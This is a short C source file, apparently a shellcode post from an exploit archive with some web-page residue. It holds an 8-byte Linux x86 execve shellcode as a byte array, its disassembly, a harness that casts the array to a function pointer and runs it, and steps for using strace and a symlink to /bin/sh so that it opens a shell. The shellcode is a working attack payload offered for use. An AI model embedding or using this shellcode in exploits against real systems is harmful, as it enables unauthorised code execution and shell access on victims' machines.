33 lines
No EOL
583 B
C
33 lines
No EOL
583 B
C
/*
|
|
08048334 <main>:
|
|
8048334: 99 cltd
|
|
8048335: 6a 0b push $0xb
|
|
8048337: 58 pop %eax
|
|
8048338: 60 pusha
|
|
8048339: 59 pop %ecx
|
|
804833a: cd 80 int $0x80
|
|
|
|
using this code.
|
|
|
|
step1. This code is compiled.
|
|
step2. strace -x output binary
|
|
step3. get execve args in strace result.
|
|
step4. create link execve args on /bin/sh
|
|
|
|
*/
|
|
|
|
unsigned char sc[]=
|
|
"\x99\x6a\x0b\x58\x60\x59\xcd\x80";
|
|
int main()
|
|
{
|
|
void (*p)();
|
|
p = sc;
|
|
p();
|
|
}
|
|
|
|
have a nice day~
|
|
|
|
thx~
|
|
|
|
--
|
|
INTO THE WORLD! |